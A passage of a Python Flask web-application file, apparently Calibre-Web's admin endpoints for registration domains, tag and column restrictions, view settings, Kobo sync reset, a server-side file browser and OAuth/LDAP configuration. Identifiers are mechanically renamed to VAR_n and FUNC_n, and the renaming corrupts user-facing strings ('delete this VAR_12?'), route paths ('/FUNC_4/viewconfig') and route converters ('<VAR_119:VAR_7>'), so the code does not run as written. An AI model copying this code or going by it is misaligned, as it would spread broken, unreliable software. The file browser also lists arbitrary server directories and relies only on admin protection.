                        .join(db.books_languages_link) \
                        .join(db.Books) \
                        .filter(calibre_db.common_filters()) \
                        .group_by(VAR_130('books_languages_link.lang_code')).all()
                    VAR_131 = [lang.lang_code for lang in VAR_23] + ["all"]
                    if VAR_61['value'] in VAR_131:
                        VAR_12.default_language = VAR_61['value']
                    else:
                        raise Exception(_("No Valid Book Language Given"))
                else:
                    return _("Parameter not found"), 400
        except Exception as ex:
            VAR_0.debug_or_exception(ex)
            return str(ex), 400
    ub.session_commit()
    return ""
@VAR_2.route("/ajax/user_table_settings", methods=['POST'])
@login_required
@FUNC_0
def FUNC_17():
    # Persist the admin's user-table view settings (posted as JSON) on the
    # current user's profile.
    VAR_62.view_settings['useredit'] = json.loads(request.data)
    try:
        try:
            # mark the mutated JSON column dirty so SQLAlchemy writes it back
            flag_modified(VAR_62, "view_settings")
        except AttributeError:
            pass
        ub.session.commit()
    except (InvalidRequestError, OperationalError):
        VAR_0.error("Invalid request received: {}".format(request))
        return "Invalid request", 400
    return ""
def FUNC_18(VAR_5):
    """Return True when VAR_5 is "0" or names an existing, non-deleted
    boolean custom column."""
    if VAR_5 == "0":
        return True
    matches = (calibre_db.session.query(db.Custom_Columns)
               .filter(db.Custom_Columns.id == VAR_5)
               .filter(and_(db.Custom_Columns.datatype == 'bool',
                            db.Custom_Columns.mark_for_delete == 0))
               .all())
    return bool(matches)
def FUNC_19(VAR_5):
    """Return True when VAR_5 is "0" or names an existing, non-deleted
    text custom column."""
    if VAR_5 == "0":
        return True
    matches = (calibre_db.session.query(db.Custom_Columns)
               .filter(db.Custom_Columns.id == VAR_5)
               .filter(and_(db.Custom_Columns.datatype == 'text',
                            db.Custom_Columns.mark_for_delete == 0))
               .all())
    return bool(matches)
@VAR_2.route("/FUNC_4/viewconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_20():
    # Persist the "View Configuration" admin form: UI options, default
    # visibilities and the default role mask for new users.
    VAR_16 = request.form.to_dict()
    FUNC_41(VAR_16, "config_calibre_web_title")
    FUNC_41(VAR_16, "config_columns_to_ignore")
    if FUNC_41(VAR_16, "config_title_regex"):
        # title-sort regex changed: recompute the stored title sort keys
        calibre_db.update_title_sort(config)
    if not FUNC_18(VAR_16.get("config_read_column", "0")):
        flash(_(u"Invalid Read Column"), category="error")
        VAR_0.debug("Invalid Read column")
        return FUNC_10()
    FUNC_38(VAR_16, "config_read_column")
    if not FUNC_19(VAR_16.get("config_restricted_column", "0")):
        flash(_(u"Invalid Restricted Column"), category="error")
        VAR_0.debug("Invalid Restricted Column")
        return FUNC_10()
    FUNC_38(VAR_16, "config_restricted_column")
    FUNC_38(VAR_16, "config_theme")
    FUNC_38(VAR_16, "config_random_books")
    FUNC_38(VAR_16, "config_books_per_page")
    FUNC_38(VAR_16, "config_authors_max")
    FUNC_41(VAR_16, "config_default_language")
    FUNC_41(VAR_16, "config_default_locale")
    config.config_default_role = constants.selected_roles(VAR_16)
    config.config_default_role &= ~constants.ROLE_ANONYMOUS
    # the checked "show_*" checkboxes encode bit values in their names;
    # summing them yields the default sidebar-view bitmask
    config.config_default_show = sum(VAR_119(k[5:]) for k in VAR_16 if k.startswith('show_'))
    if "Show_detail_random" in VAR_16:
        config.config_default_show |= constants.DETAIL_RANDOM
    config.save()
    flash(_(u"Calibre-Web FUNC_6 updated"), category="success")
    VAR_0.debug("Calibre-Web FUNC_6 updated")
    FUNC_1()
    return FUNC_10()
@VAR_2.route("/ajax/loaddialogtexts/<VAR_6>", methods=['POST'])
@login_required
def FUNC_21(VAR_6):
    """Look up the confirmation-dialog body text for the given element id."""
    messages = {
        "config_delete_kobo_token": _('Do you really want to delete the Kobo Token?'),
        "btndeletedomain": _('Do you really want to delete this domain?'),
        "btndeluser": _('Do you really want to delete this VAR_12?'),
        "delete_shelf": _('Are you sure you want to delete this shelf?'),
        "select_locale": _('Are you sure you want to change locales of selected VAR_12(s)?'),
        "select_default_language": _('Are you sure you want to change visible book VAR_23 for selected VAR_12(s)?'),
        "role": _('Are you sure you want to change the selected role for the selected VAR_12(s)?'),
        "restrictions": _('Are you sure you want to change the selected restrictions for the selected VAR_12(s)?'),
        "sidebar_view": _('Are you sure you want to change the selected VAR_39 restrictions for the selected VAR_12(s)?'),
        "kobo_only_shelves_sync": _('Are you sure you want to change shelf sync behavior for the selected VAR_12(s)?'),
        "db_submit": _('Are you sure you want to change Calibre library location?'),
        "btnfullsync": _("Are you sure you want delete Calibre-Web's sync database to force a full sync with your Kobo Reader?"),
    }
    return json.dumps({"header": "", "main": messages.get(VAR_6, ""), "valid": 1})
@VAR_2.route("/ajax/editdomain/<VAR_119:VAR_7>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_22(VAR_7):
    """Rename an existing registration-domain rule; '*'/'?' wildcards are
    stored as their SQL LIKE equivalents '%'/'_'."""
    form = request.form.to_dict()
    entry = ub.session.query(ub.Registration).filter(ub.Registration.id == form['pk']).first()
    entry.domain = form['value'].replace('*', '%').replace('?', '_').lower()
    return ub.session_commit("Registering Domains edited {}".format(entry.domain))
@VAR_2.route("/ajax/adddomain/<VAR_119:VAR_7>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_23(VAR_7):
    """Add a registration-domain rule (VAR_7 selects the allow/deny list).

    Fix: the new row was created with ``VAR_7=allow``, which references an
    undefined name and the wrong keyword; the model column is ``allow``
    (cf. the ``ub.Registration.allow`` filter above) and the value is this
    view's VAR_7 argument.
    """
    VAR_65 = request.form.to_dict()['domainname'].replace('*', '%').replace('?', '_').lower()
    # only insert when the exact rule does not exist yet
    VAR_66 = ub.session.query(ub.Registration).filter(ub.Registration.domain == VAR_65)\
        .filter(ub.Registration.allow == VAR_7).first()
    if not VAR_66:
        VAR_100 = ub.Registration(domain=VAR_65, allow=VAR_7)
        ub.session.add(VAR_100)
        ub.session_commit("Registering Domains added {}".format(VAR_65))
    return ""
@VAR_2.route("/ajax/deletedomain", methods=['POST'])
@login_required
@FUNC_0
def FUNC_24():
    """Delete a registration-domain rule; when the last allow rule disappears,
    re-seed the default allow-everything rule ("%.%", i.e. "*.*").

    Fix: the fallback row was created with the keyword ``VAR_7=1``; the model
    column is ``allow`` (cf. the ``ub.Registration.allow == 1`` query right
    above), so the correct keyword is ``allow=1``.
    """
    try:
        VAR_101 = request.form.to_dict()['domainid'].replace('*', '%').replace('?', '_').lower()
        ub.session.query(ub.Registration).filter(ub.Registration.id == VAR_101).delete()
        ub.session_commit("Registering Domains deleted {}".format(VAR_101))
        if not ub.session.query(ub.Registration).filter(ub.Registration.allow == 1).count():
            VAR_100 = ub.Registration(domain="%.%", allow=1)
            ub.session.add(VAR_100)
            ub.session_commit("Last Registering Domain deleted, added *.* as default")
    except KeyError:
        # no 'domainid' in the posted form: nothing to delete
        pass
    return ""
@VAR_2.route("/ajax/domainlist/<VAR_119:VAR_7>")
@login_required
@FUNC_0
def FUNC_25(VAR_7):
    # List the registration domains of one list (VAR_7 selects allow/deny);
    # SQL LIKE wildcards are mapped back to the user-facing '*'/'?' syntax.
    VAR_64 = ub.session.query(ub.Registration).filter(ub.Registration.allow == VAR_7).all()
    VAR_67 = json.dumps([{"domain": r.domain.replace('%', '*').replace('_', '?'), "id": r.id} for r in VAR_64])
    # NOTE(review): the double-encode / quote-swap dance below preserves this
    # endpoint's historic output quoting — do not simplify without checking
    # the consuming client code.
    VAR_68 = json.dumps(VAR_67.replace('"', "'")).lstrip('"').strip('"')
    VAR_52 = make_response(VAR_68.replace("'", '"'))
    VAR_52.headers["Content-Type"] = "application/json; charset=utf-8"
    return VAR_52
@VAR_2.route("/ajax/editrestriction/<VAR_119:VAR_8>", defaults={"user_id": 0}, methods=['POST'])
@VAR_2.route("/ajax/editrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_26(VAR_8, VAR_9):
    # Edit one entry of an allow/deny restriction list.
    # VAR_8 selects the list type: 0 = template tags, 1 = template custom
    # column, 2 = per-user tags, 3 = per-user custom column.
    # The posted element id is 'a<i>' (allow) or 'd<i>' (deny) where <i> is
    # the element's index within the comma-separated list.
    VAR_10 = request.form.to_dict()
    if VAR_10['id'].startswith('a'):
        if VAR_8 == 0:  # Tags as template
            VAR_69 = config.list_allowed_tags()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            config.config_allowed_tags = ','.join(VAR_69)
            config.save()
        if VAR_8 == 1:  # CustomC
            VAR_69 = config.list_allowed_column_values()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            config.config_allowed_column_value = ','.join(VAR_69)
            config.save()
        if VAR_8 == 2:  # Tags per VAR_12
            # VAR_9 is an int for an explicit user id, otherwise fall back to
            # the current user
            if isinstance(VAR_9, VAR_119):
                VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
            else:
                VAR_120 = VAR_62
            VAR_69 = VAR_120.list_allowed_tags()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            VAR_120.allowed_tags = ','.join(VAR_69)
            ub.session_commit("Changed allowed VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.allowed_tags))
        if VAR_8 == 3:  # CColumn per VAR_12
            if isinstance(VAR_9, VAR_119):
                VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
            else:
                VAR_120 = VAR_62
            VAR_69 = VAR_120.list_allowed_column_values()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            VAR_120.allowed_column_value = ','.join(VAR_69)
            ub.session_commit("Changed allowed columns of VAR_12 {} to {}".format(VAR_120.name, VAR_120.allowed_column_value))
    if VAR_10['id'].startswith('d'):
        if VAR_8 == 0:  # Tags as template
            VAR_69 = config.list_denied_tags()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            config.config_denied_tags = ','.join(VAR_69)
            config.save()
        if VAR_8 == 1:  # CustomC
            VAR_69 = config.list_denied_column_values()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            config.config_denied_column_value = ','.join(VAR_69)
            config.save()
        if VAR_8 == 2:  # Tags per VAR_12
            if isinstance(VAR_9, VAR_119):
                VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
            else:
                VAR_120 = VAR_62
            VAR_69 = VAR_120.list_denied_tags()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            VAR_120.denied_tags = ','.join(VAR_69)
            ub.session_commit("Changed denied VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.denied_tags))
        if VAR_8 == 3:  # CColumn per VAR_12
            if isinstance(VAR_9, VAR_119):
                VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
            else:
                VAR_120 = VAR_62
            VAR_69 = VAR_120.list_denied_column_values()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            VAR_120.denied_column_value = ','.join(VAR_69)
            ub.session_commit("Changed denied columns of VAR_12 {} to {}".format(VAR_120.name, VAR_120.denied_column_value))
    return ""
def FUNC_27(VAR_10, VAR_11):
    """Append VAR_10['add_element'] to the comma-separated list produced by
    the getter VAR_11() and return the joined string; duplicates are ignored.

    Fix: the append targeted an undefined name ``elementlist`` (NameError);
    it now appends to the local list VAR_69.
    """
    VAR_69 = VAR_11()
    if VAR_69 == ['']:
        # getter yields [''] for an empty stored string — treat as empty list
        VAR_69 = []
    if not VAR_10['add_element'] in VAR_69:
        VAR_69 += [VAR_10['add_element']]
    return ','.join(VAR_69)
def FUNC_28(VAR_10, VAR_11):
    """Remove VAR_10['Element'] from the comma-separated list produced by the
    getter VAR_11() and return the joined string; missing elements are ignored.

    Fix: the removal targeted an undefined name ``elementlist`` (NameError);
    it now removes from the local list VAR_69.
    """
    VAR_69 = VAR_11()
    if VAR_10['Element'] in VAR_69:
        VAR_69.remove(VAR_10['Element'])
    return ','.join(VAR_69)
def FUNC_29(VAR_12, VAR_13, VAR_14, VAR_15):
    # Build the new comma-separated restriction string for user VAR_12.
    # VAR_13: "add" or "remove"; VAR_14: the user attribute being edited
    # (…tags or …column_value); VAR_15: posted element ids to resolve.
    if "tags" in VAR_14:
        VAR_40 = calibre_db.session.query(db.Tags).filter(db.Tags.id.in_(VAR_15)).all()
        if not VAR_40:
            raise Exception(_("Tag not found"))
        VAR_102 = [VAR_17.name for VAR_17 in VAR_40]
    else:
        # custom-column values resolved through the configured restricted column
        VAR_40 = calibre_db.session.query(db.cc_classes[config.config_restricted_column])\
            .filter(db.cc_classes[config.config_restricted_column].id.in_(VAR_15)).all()
        VAR_102 = [VAR_17.value for VAR_17 in VAR_40]
    # current list of the user's restriction values (empty string -> [])
    VAR_70 = VAR_12.__dict__[VAR_14].split(",") if len(VAR_12.__dict__[VAR_14]) else []
    if VAR_13 == "remove":
        VAR_70 = [VAR_17 for VAR_17 in VAR_70 if VAR_17 not in VAR_102]
    elif VAR_13 == "add":
        VAR_70.extend(VAR_17 for VAR_17 in VAR_102 if VAR_17 not in VAR_70)
    else:
        raise Exception(_("Invalid Action"))
    return ",".join(VAR_70)
@VAR_2.route("/ajax/addrestriction/<VAR_119:VAR_8>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_30(VAR_8):
    # Template variant of the add-restriction endpoint: delegate with a
    # dummy user id of 0 (only the template branches 0/1 are relevant here).
    return FUNC_31(VAR_8, 0)
@VAR_2.route("/ajax/addrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_31(VAR_8, VAR_9):
    """Add an element to an allow ('submit_allow') or deny ('submit_deny')
    restriction list. VAR_8: 0 = template tags, 1 = template custom column,
    2 = per-user tags, 3 = per-user custom column; VAR_9 is the user id.

    Fix: for VAR_8 == 1 the source lists were swapped — 'submit_allow'
    appended to the *denied* column values and 'submit_deny' to the *allowed*
    ones; each now reads from its own list (matching the tag branches).
    """
    VAR_10 = request.form.to_dict()
    if VAR_8 == 0:  # Tags as template
        if 'submit_allow' in VAR_10:
            config.config_allowed_tags = FUNC_27(VAR_10, config.list_allowed_tags)
            config.save()
        elif 'submit_deny' in VAR_10:
            config.config_denied_tags = FUNC_27(VAR_10, config.list_denied_tags)
            config.save()
    if VAR_8 == 1:  # CCustom as template
        if 'submit_allow' in VAR_10:
            config.config_allowed_column_value = FUNC_27(VAR_10, config.list_allowed_column_values)
            config.save()
        elif 'submit_deny' in VAR_10:
            config.config_denied_column_value = FUNC_27(VAR_10, config.list_denied_column_values)
            config.save()
    if VAR_8 == 2:  # Tags per VAR_12
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
        else:
            VAR_120 = VAR_62
        if 'submit_allow' in VAR_10:
            VAR_120.allowed_tags = FUNC_27(VAR_10, VAR_120.list_allowed_tags)
            ub.session_commit("Changed allowed VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.list_allowed_tags()))
        elif 'submit_deny' in VAR_10:
            VAR_120.denied_tags = FUNC_27(VAR_10, VAR_120.list_denied_tags)
            ub.session_commit("Changed denied VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.list_denied_tags()))
    if VAR_8 == 3:  # CustomC per VAR_12
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
        else:
            VAR_120 = VAR_62
        if 'submit_allow' in VAR_10:
            VAR_120.allowed_column_value = FUNC_27(VAR_10, VAR_120.list_allowed_column_values)
            ub.session_commit("Changed allowed columns of VAR_12 {} to {}".format(VAR_120.name,
                                                                                  VAR_120.list_allowed_column_values()))
        elif 'submit_deny' in VAR_10:
            VAR_120.denied_column_value = FUNC_27(VAR_10, VAR_120.list_denied_column_values)
            ub.session_commit("Changed denied columns of VAR_12 {} to {}".format(VAR_120.name,
                                                                                 VAR_120.list_denied_column_values()))
    return ""
@VAR_2.route("/ajax/deleterestriction/<VAR_119:VAR_8>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_32(VAR_8):
    # Template variant of the delete-restriction endpoint: delegate with a
    # dummy user id of 0 (only the template branches 0/1 are relevant here).
    return FUNC_33(VAR_8, 0)
@VAR_2.route("/ajax/deleterestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_33(VAR_8, VAR_9):
    # Remove one element from an allow ('a…' id prefix) or deny ('d…' id
    # prefix) restriction list. VAR_8: 0 = template tags, 1 = template custom
    # column, 2 = per-user tags, 3 = per-user custom column; VAR_9 = user id.
    VAR_10 = request.form.to_dict()
    if VAR_8 == 0:  # Tags as template
        if VAR_10['id'].startswith('a'):
            config.config_allowed_tags = FUNC_28(VAR_10, config.list_allowed_tags)
            config.save()
        elif VAR_10['id'].startswith('d'):
            config.config_denied_tags = FUNC_28(VAR_10, config.list_denied_tags)
            config.save()
    elif VAR_8 == 1:  # CustomC as template
        if VAR_10['id'].startswith('a'):
            config.config_allowed_column_value = FUNC_28(VAR_10, config.list_allowed_column_values)
            config.save()
        elif VAR_10['id'].startswith('d'):
            config.config_denied_column_value = FUNC_28(VAR_10, config.list_denied_column_values)
            config.save()
    elif VAR_8 == 2:  # Tags per VAR_12
        # int VAR_9 -> explicit user, otherwise current user
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
        else:
            VAR_120 = VAR_62
        if VAR_10['id'].startswith('a'):
            VAR_120.allowed_tags = FUNC_28(VAR_10, VAR_120.list_allowed_tags)
            ub.session_commit("Deleted allowed VAR_40 of VAR_12 {}: {}".format(VAR_120.name, VAR_120.list_allowed_tags))
        elif VAR_10['id'].startswith('d'):
            VAR_120.denied_tags = FUNC_28(VAR_10, VAR_120.list_denied_tags)
            ub.session_commit("Deleted denied VAR_40 of VAR_12 {}: {}".format(VAR_120.name, VAR_120.list_allowed_tags))
    elif VAR_8 == 3:  # Columns per VAR_12
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
        else:
            VAR_120 = VAR_62
        if VAR_10['id'].startswith('a'):
            VAR_120.allowed_column_value = FUNC_28(VAR_10, VAR_120.list_allowed_column_values)
            ub.session_commit("Deleted allowed columns of VAR_12 {}: {}".format(VAR_120.name,
                                                                                VAR_120.list_allowed_column_values))
        elif VAR_10['id'].startswith('d'):
            VAR_120.denied_column_value = FUNC_28(VAR_10, VAR_120.list_denied_column_values)
            ub.session_commit("Deleted denied columns of VAR_12 {}: {}".format(VAR_120.name,
                                                                               VAR_120.list_denied_column_values))
    return ""
@VAR_2.route("/ajax/listrestriction/<VAR_119:VAR_8>", defaults={"user_id": 0})
@VAR_2.route("/ajax/listrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>")
@login_required
@FUNC_0
def FUNC_34(VAR_8, VAR_9):
    # Return one restriction list as JSON rows of {Element, type, id}; the
    # id is 'd<i>' for deny entries and 'a<i>' for allow entries, where <i>
    # is the element's index in the underlying comma-separated list.
    if VAR_8 == 0:  # Tags as template
        VAR_103 = [{'Element': VAR_17, 'type':_('Deny'), 'id': 'd'+str(i) }
                   for i,VAR_17 in enumerate(config.list_denied_tags()) if VAR_17 != '']
        VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, VAR_17 in enumerate(config.list_allowed_tags()) if VAR_17 != '']
        VAR_67 = VAR_103 + VAR_7
    elif VAR_8 == 1:  # CustomC as template
        VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
                   for i, VAR_17 in enumerate(config.list_denied_column_values()) if VAR_17 != '']
        VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, VAR_17 in enumerate(config.list_allowed_column_values()) if VAR_17 != '']
        VAR_67 = VAR_103 + VAR_7
    elif VAR_8 == 2:  # Tags per VAR_12
        # int VAR_9 -> explicit user, otherwise current user
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_9).first()
        else:
            VAR_120 = VAR_62
        VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
                   for i, VAR_17 in enumerate(VAR_120.list_denied_tags()) if VAR_17 != '']
        VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, VAR_17 in enumerate(VAR_120.list_allowed_tags()) if VAR_17 != '']
        VAR_67 = VAR_103 + VAR_7
    elif VAR_8 == 3:  # CustomC per VAR_12
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_9).first()
        else:
            VAR_120 = VAR_62
        VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
                   for i, VAR_17 in enumerate(VAR_120.list_denied_column_values()) if VAR_17 != '']
        VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, VAR_17 in enumerate(VAR_120.list_allowed_column_values()) if VAR_17 != '']
        VAR_67 = VAR_103 + VAR_7
    else:
        VAR_67 = ""
    VAR_68 = json.dumps(VAR_67)
    VAR_52 = make_response(VAR_68)
    VAR_52.headers["Content-Type"] = "application/json; charset=utf-8"
    return VAR_52
@VAR_2.route("/ajax/fullsync")
@login_required
def FUNC_35():
    """Drop the current user's Kobo sync bookkeeping so the next sync is a
    full sync; reports the number of removed entries."""
    deleted = ub.session.query(ub.KoboSyncedBooks).filter(VAR_62.id == ub.KoboSyncedBooks.user_id).delete()
    message = _("{} sync entries deleted").format(deleted)
    ub.session_commit(message)
    return Response(json.dumps([{"type": "success", "message": message}]), mimetype='application/json')
@VAR_2.route("/ajax/FUNC_37/")
@login_required
@FUNC_0
def FUNC_36():
    # Admin-only HTTP wrapper around the path-chooser backend FUNC_37.
    return FUNC_37()
def FUNC_37():
    """Backend of the server-side file/folder browser dialog.

    Reads 'path', 'folder' and 'filter' from the request args and returns a
    JSON listing of the resolved directory.

    Fix: when the supplied path points at a file, the dialog should open the
    file's parent directory; the ``os.path.dirname`` result was assigned to a
    dead name (``path``) instead of VAR_75, so the subsequent ``isdir`` check
    always failed and browsing fell back to the process cwd.

    NOTE(review): this walks the real filesystem without root confinement;
    it is only reachable through the admin-protected route FUNC_36 — confirm
    that is the sole caller before relaxing access.
    """
    VAR_72 = "folder"
    VAR_73 = request.args.get('folder', False) == "true"   # list folders only?
    VAR_74 = request.args.get('filter', "")                # exact filename filter
    VAR_75 = os.path.normpath(request.args.get('path', ""))
    if os.path.isfile(VAR_75):
        VAR_104 = VAR_75
        VAR_75 = os.path.dirname(VAR_75)   # browse the file's directory
    else:
        VAR_104 = ""
    VAR_76 = False
    if os.path.isdir(VAR_75):
        VAR_77 = os.path.realpath(VAR_75)
        VAR_76 = True
    else:
        VAR_77 = os.getcwd()
    VAR_77 = os.path.normpath(os.path.realpath(VAR_77))
    VAR_78 = os.path.dirname(VAR_77)
    if not VAR_76:
        # relative display paths when no absolute directory was supplied
        if os.path.realpath(VAR_77) == os.path.realpath("/"):
            VAR_77 = os.path.relpath(VAR_77)
        else:
            VAR_77 = os.path.relpath(VAR_77) + os.path.sep
        VAR_78 = os.path.relpath(VAR_78) + os.path.sep
    if os.path.realpath(VAR_77) == os.path.realpath("/"):
        VAR_78 = ""   # filesystem root has no parent
    try:
        VAR_105 = os.listdir(VAR_77)
    except Exception:
        VAR_105 = []   # unreadable directory: show it empty
    VAR_79 = []
    for VAR_3 in VAR_105:
        try:
            VAR_121 = {"name": VAR_3, "fullpath": os.path.join(VAR_77, VAR_3)}
            VAR_121["sort"] = VAR_121["fullpath"].lower()
        except Exception:
            continue
        if os.path.isfile(os.path.join(VAR_77, VAR_3)):
            if VAR_73:
                continue
            if VAR_74 != "" and VAR_74 != VAR_3:
                continue
            VAR_121["type"] = "file"
            VAR_121["size"] = os.path.getsize(os.path.join(VAR_77, VAR_3))
            # human-readable size: shift by 10 bits per unit step
            VAR_122 = 0
            while (VAR_121["size"] >> 10) > 0.3:
                VAR_122 += 1
                VAR_121["size"] >>= 10
            VAR_123 = ("", "K", "M", "G", "T")
            VAR_121["size"] = str(VAR_121["size"]) + " " + VAR_123[VAR_122] + "Byte"
        else:
            VAR_121["type"] = "dir"
            VAR_121["size"] = ""
        VAR_79.append(VAR_121)
    VAR_79 = sorted(VAR_79, key=operator.itemgetter("type", "sort"))
    VAR_80 = {
        "cwd": VAR_77,
        "files": VAR_79,
        "parentdir": VAR_78,
        "type": VAR_72,
        "oldfile": VAR_104,
        "absolute": VAR_76,
    }
    return json.dumps(VAR_80)
def FUNC_38(VAR_16, VAR_17, VAR_18=VAR_119):
    # Copy form field VAR_17 from dict VAR_16 into config, converted via
    # VAR_18 (defaults to the int converter); returns the setter's result.
    return config.set_from_dictionary(VAR_16, VAR_17, VAR_18)
def FUNC_39(VAR_16, VAR_17):
    # Copy checkbox field VAR_17 into config as a boolean ("on" -> True),
    # defaulting to False when the field is absent.
    return config.set_from_dictionary(VAR_16, VAR_17, lambda y: y == "on", False)
def FUNC_40(VAR_16, VAR_17):
    # Copy checkbox field VAR_17 into config as an int flag ("on" -> 1),
    # defaulting to 0 when the field is absent.
    return config.set_from_dictionary(VAR_16, VAR_17, lambda y: 1 if (y == "on") else 0, 0)
def FUNC_41(VAR_16, VAR_17):
    # Copy text field VAR_17 into config with surrounding whitespace stripped
    # (None/empty values pass through unchanged).
    return config.set_from_dictionary(VAR_16, VAR_17, lambda y: y.strip() if y else y)
def FUNC_42(VAR_16):
    # Apply the Google-Drive section of the configuration form.
    # Returns a gdrive error text (or an error response via FUNC_50) or None.
    VAR_21 = None
    if VAR_16.get("config_use_google_drive"):
        VAR_106 = {}
        if not os.path.isfile(gdriveutils.SETTINGS_YAML):
            # settings.yaml missing: gdrive cannot be enabled
            config.config_use_google_drive = False
        if gdrive_support:
            VAR_21 = gdriveutils.get_error_text(VAR_106)
        if "config_use_google_drive" in VAR_16 and not config.config_use_google_drive and not VAR_21:
            with open(gdriveutils.CLIENT_SECRETS, 'r') as settings:
                VAR_106 = json.load(settings)['web']
            if not VAR_106:
                return FUNC_50(_('client_secrets.json Is Not Configured For Web Application'))
            gdriveutils.update_settings(
                VAR_106['client_id'],
                VAR_106['client_secret'],
                VAR_106['redirect_uris'][0]
            )
    # enable gdrive only when requested AND no error occurred
    VAR_81 = (not VAR_21) and ("config_use_google_drive" in VAR_16)
    if config.config_use_google_drive and not VAR_81:
        # turning gdrive off: drop the cached watch-changes response
        config.config_google_drive_watch_changes_response = {}
    config.config_use_google_drive = VAR_81
    if FUNC_41(VAR_16, "config_google_drive_folder"):
        # folder changed: the cached drive database is stale
        gdriveutils.deleteDatabaseOnChange()
    return VAR_21
def FUNC_43(VAR_16):
    # Apply the OAuth provider credentials from the config form VAR_16 to the
    # module-level provider list VAR_96 and persist them; returns True when
    # any provider's credentials changed.
    VAR_82 = 0       # count of fully configured providers (id AND secret set)
    VAR_83 = False   # did anything change?
    for VAR_10 in VAR_96:
        if VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"] != VAR_10['oauth_client_id'] \
                or VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"] != VAR_10['oauth_client_secret']:
            VAR_83 = True
            VAR_10['oauth_client_id'] = VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"]
            VAR_10['oauth_client_secret'] = VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"]
        if VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"] \
                and VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"]:
            VAR_82 += 1
            VAR_10["active"] = 1
        else:
            VAR_10["active"] = 0
        ub.session.query(ub.OAuthProvider).filter(ub.OAuthProvider.id == VAR_10['id']).update(
            {"oauth_client_id": VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"],
             "oauth_client_secret": VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"],
             "active": VAR_10["active"]})
    return VAR_83
def FUNC_44(VAR_16):
    # Apply the logging section of the config form.
    # Returns (changed, error-response-or-None).
    VAR_83 = False
    VAR_83 |= FUNC_38(VAR_16, "config_log_level")
    VAR_83 |= FUNC_41(VAR_16, "config_logfile")
    if not logger.is_valid_logfile(config.config_logfile):
        return VAR_83, \
            FUNC_50(_('Logfile Location is not Valid, Please Enter Correct Path'))
    VAR_83 |= FUNC_40(VAR_16, "config_access_log")
    VAR_83 |= FUNC_41(VAR_16, "config_access_logfile")
    if not logger.is_valid_logfile(config.config_access_logfile):
        return VAR_83, \
            FUNC_50(_('Access Logfile Location is not Valid, Please Enter Correct Path'))
    return VAR_83, None
def FUNC_45(VAR_16):
    # Apply and validate the LDAP section of the config form.
    # Returns (changed, error-response-or-None); any validation failure
    # short-circuits with an error built by FUNC_50.
    VAR_83 = False
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_provider_url")
    VAR_83 |= FUNC_38(VAR_16, "config_ldap_port")
    VAR_83 |= FUNC_38(VAR_16, "config_ldap_authentication")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_dn")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_serv_username")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_user_object")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_group_object_filter")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_group_members_field")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_member_user_object")
